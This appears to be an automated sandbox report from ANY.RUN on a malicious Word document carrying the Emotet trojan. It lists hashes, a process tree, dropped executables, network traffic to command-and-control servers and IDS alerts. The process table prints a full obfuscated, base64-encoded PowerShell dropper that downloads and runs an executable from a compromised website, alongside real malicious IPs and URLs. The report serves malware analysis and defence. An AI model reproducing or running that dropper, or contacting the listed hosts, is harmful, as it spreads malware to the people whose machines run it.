download: | 2exxbj-u6sguew-ezrvvro |
Full analysis: | https://app.any.run/tasks/ebfd0aa0-701c-4a16-a302-27f62d37771e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 23, 2019, 10:07:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 09:33:00 2019, Last Saved Time/Date: Tue Apr 23 09:33:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0 |
MD5: | C1E4EF4D609DA5413602123A679B6FCB |
SHA1: | 7194E89B0DDF5C90C5F12EE7E29901F6DBAB8881 |
SHA256: | 78ED92AD5D192475A5AA2E710BDBA8564842FD89547D606D3064B007A87239B4 |
SSDEEP: | 6144:u77HUUUUUUUUUUUUUUUUUUUT52VRzS4IWBW0LoxkczdQwt1Xar:u77HUUUUUUUUUUUUUUUUUUUTCRzmW807 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 4 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 4 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:23 08:33:00 |
CreateDate: | 2019:04:23 08:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1084 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2exxbj-u6sguew-ezrvvro.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2728 | powershell -e JAByAEEAMQAxAG8ARABVAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUgBYACcALAAnAFoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBCAEEAUQAnACwAJwBYACcAKQApADsAJABzADEAUQAxAFUAbwAgAD0AIAAnADIAMwAzACcAOwAkAEUAQQBBADQAQQB4AHcAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARABRACcALAAnAFoAQQBYACcALAAnAFEAJwApADsAJABpAEEAXwBHAEEAawBrAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHMAMQBRADEAVQBvACsAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB4AGUAJwAsACcALgBlACcAKQA7ACQAUwAxAG8AawBjAEQARwA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFcAQQBBACcALAAnAFEAJwApACwAJwBEACcALAAnAEEAQQBEACcAKQA7ACQASwBaAEQAQQBYAEEAQgA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBlAEIAQwBMAGkAYABlAG4AdAA7ACQAegBRAF8AVQBBAEEAQwB3AD0AKAAiAHsANAB9AHsANgB9AHsAMwB9AHsAMgA4AH0AewAyADIAfQB7ADEANwB9AHsAMQAyAH0AewAyADUAfQB7ADEANAB9AHsAMgAzAH0AewA4AH0AewA5AH0AewA1AH0AewAxADUAfQB7ADIANAB9AHsAMQA4AH0AewAyADAAfQB7ADIANwB9AHsAMQAxAH0AewAwAH0AewAxAH0AewAyADEAfQB7ADEAOQB9AHsAMgA5AH0AewAyADYAfQB7ADEANgB9AHsAMQAwAH0AewAyAH0AewA3AH0AewAxADMAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtAGEAJwAsACcAdQBpACcAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwB3ACcALAAnAG0ALwAnACwAJwBwAC0AYQAnACkALAAnAG4AdAAuACcALAAnAGMAbwAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGwALwB3ACcALAAnAG4AJwApACwAJwBwACcAKQAsACcAaQBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAcAA6ACcALAAnAGgAdAAnACkALAAnAHAAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAvAC8AJwAsACcAbQB1AGwAJwApACwAJwB0AGkAJwAsACcAdAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByACcALAAnAGEAJwAsACcAZABlAHAAbwAnACkAKQAsACcALQBhACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAuACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAbgAuAG8AcgAnACwAJwBnACcAKQApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBuAGcALwAnACwAJwB3ACcAKQAsACcALgAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvAC8AZwAnACwAJwB0AHAAOgAnACwAJwBAAGgAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdAAnACwAJwB0AHAAOgAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACcALwBsAFoAXwAnACwAJwBlADEAJwAsACcAbgAnACkALAAnAC8AJwAsACcAZABtAGkAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0AYQBzACcALAAnAC8AJwApACwAJwBwACcAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBvAG4AJwAsACcALQBjACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAZQBuAHQAJwAsACcALwB1ACcAKQAsACcAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAbwBtACcALAAnAGUAJwApACwAJwBAAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAYwAnACwAJwBsAC4AaQAnACwAJwBlAGwAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnADoALwAvACcALAAnAHQAcAAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvACcALAAnAHcAcAAtACcAKQAsACcAZAAnACkALAAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AewA0AH0AIgAtAGYAJwBpAG4AJwAsACcAXwB4ADgAJwAsACcALwBjACcALAAnAGQAbQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAEAAaAAnACwAJwB0ACcAKQApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuAHQAJwAsACcAYwBvAG4AdABlACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAcQAvACcALAAnAF8AZwAnACkALAAnAC8ANgAnACkALAAnAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwBAACcALAAnAF8AQQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8ALwAnACwAJwBmAHIAZQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGgAdAB0AHAAJwAsACcAOgAnACkALAAnAGUAJwApACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBkACcALAAnAGEAbABvAG4AaABhAG4AJwApACwAJwBzACcAKQAsACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAXwBmACcALAAnAGkAbgBjACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBsAHUAZAAnACwAJwBlAHMALwBnACcAKQApACwAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAdAAuACcALAAnAHAAJwAsACcALQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBjAG8AJwAsACcAbQAvAHcAJwApACkALAAnAHIAaQBtACcAKQAuACIAUwBgAFAATABJAHQAIgAoACcAQAAnACkAOwAkAGQAQQBBADEAQQAxAFEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwAxAHcARAAnACkALAAnAEEAJwApACwAJwByAEEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAZgBBAG8AQQBvAGMAVQAgAGkAbgAgACQAegBRAF8AVQBBAEEAQwB3ACkAewB0AHIAeQB7ACQASwBaAEQAQQBYAEEAQgAuACIARABPAFcATgBsAG8AQQBgAGQAZgBJAGAATABFACIAKAAkAGYAQQBvAEEAbwBjAFUALAAgACQAaQBBAF8ARwBBAGsAawBjACkAOwAkAEYAQQA0AEIAXwBCAEQAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBrACcALAAnAFUAdwBEACcAKQAsACcANAAnACwAJwBDAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAGkAQQBfAEcAQQBrAGsAYwApAC4AIgBMAGUATgBgAGcAdABIACIAIAAtAGcAZQAgADMAMgA5ADkAOQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABpAEEAXwBHAEEAawBrAGMAOwAkAE0AQgBBADQAYwBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwBCAEcAQgAnACkALAAnAHQAJwApADsAYgByAGUAYQBrADsAJAB0AGMAYwBCAFUAQgAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwA0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAVQBEACcALAAnAFgAQQBaACcAKQAsACcAQQAnACkALAAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABjAEcAawA0AEEAVQBfAHcAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAJwAsACcARABBAEcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWABrACcALAAnAEgAQgAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
880 | "C:\Users\admin\233.exe" | C:\Users\admin\233.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2528 | --640a0d70 | C:\Users\admin\233.exe | 233.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2196 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 233.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2988 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2520 | "C:\Users\admin\AppData\Local\soundser\fQ2Jr67LHJ.exe" | C:\Users\admin\AppData\Local\soundser\fQ2Jr67LHJ.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2828 | --d46adfc5 | C:\Users\admin\AppData\Local\soundser\fQ2Jr67LHJ.exe | fQ2Jr67LHJ.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2248 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | fQ2Jr67LHJ.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
900 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
1084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6311.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2728 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IR2WEGFPGKWV4GXB7LKQ.temp | — | |
MD5:— | SHA256:— | |||
1084 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:03F75A861CC10AD1C3318BEB891B725B | SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58 | |||
2728 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
1084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:9652B47E53FE919488F6AD2BA1879B10 | SHA256:3B262BBCF522F1ADBA62AA79F83725B9D6DDA2DC4F9CE344F2167832421C9876 | |||
2988 | soundser.exe | C:\Users\admin\AppData\Local\soundser\fQ2Jr67LHJ.exe | executable | |
MD5:56A2BA0AC698CA5610230F8952A06CB4 | SHA256:EEDF606FF6971D64C9F98A549CE8ECBAFCBD6974B42854783ECB6E0159F38CCD | |||
2728 | powershell.exe | C:\Users\admin\233.exe | executable | |
MD5:0AD37153765933B373E0A55D54BB635A | SHA256:B2BCB7FE83FFB8606BA25C652C5DFA2B2CF0DC694AF39285546D44910B39F208 | |||
2528 | 233.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:0AD37153765933B373E0A55D54BB635A | SHA256:B2BCB7FE83FFB8606BA25C652C5DFA2B2CF0DC694AF39285546D44910B39F208 | |||
1084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$xxbj-u6sguew-ezrvvro.doc | pgc | |
MD5:EC782B9F1C73A0D2A2F2DB16829E04E8 | SHA256:02EC9234580F445D705A20C7F22EB182712A45F63D62D6EBB091AAEC731D049F | |||
2828 | fQ2Jr67LHJ.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:56A2BA0AC698CA5610230F8952A06CB4 | SHA256:EEDF606FF6971D64C9F98A549CE8ECBAFCBD6974B42854783ECB6E0159F38CCD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2728 | powershell.exe | GET | 200 | 149.255.62.85:80 | http://multitradepoint.com/wp-content/6_gq/ | GB | executable | 77.5 Kb | suspicious |
900 | soundser.exe | POST | — | 70.116.68.186:80 | http://70.116.68.186/report/vermont/ | US | — | — | malicious |
2988 | soundser.exe | POST | — | 70.116.68.186:80 | http://70.116.68.186/window/splash/ringin/ | US | — | — | malicious |
900 | soundser.exe | POST | — | 68.229.130.39:80 | http://68.229.130.39/devices/free/ringin/merge/ | US | — | — | malicious |
2988 | soundser.exe | POST | 200 | 190.112.228.47:443 | http://190.112.228.47:443/vermont/between/ringin/ | CW | binary | 85.8 Kb | malicious |
2988 | soundser.exe | POST | — | 68.229.130.39:80 | http://68.229.130.39/prep/prov/ringin/ | US | — | — | malicious |
900 | soundser.exe | POST | — | 190.112.228.47:443 | http://190.112.228.47:443/tpt/ | CW | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
900 | soundser.exe | 68.229.130.39:80 | — | Cox Communications Inc. | US | malicious |
2988 | soundser.exe | 68.229.130.39:80 | — | Cox Communications Inc. | US | malicious |
2988 | soundser.exe | 190.112.228.47:443 | — | Columbus Communications Curacao NV | CW | malicious |
900 | soundser.exe | 70.116.68.186:80 | — | Time Warner Cable Internet LLC | US | malicious |
2728 | powershell.exe | 149.255.62.85:80 | multitradepoint.com | Awareness Software Limited | GB | suspicious |
2988 | soundser.exe | 70.116.68.186:80 | — | Time Warner Cable Internet LLC | US | malicious |
900 | soundser.exe | 190.112.228.47:443 | — | Columbus Communications Curacao NV | CW | malicious |
Domain | IP | Reputation |
---|---|---|
multitradepoint.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2728 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2728 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2728 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2988 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2988 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2988 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2988 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
900 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
900 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
900 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |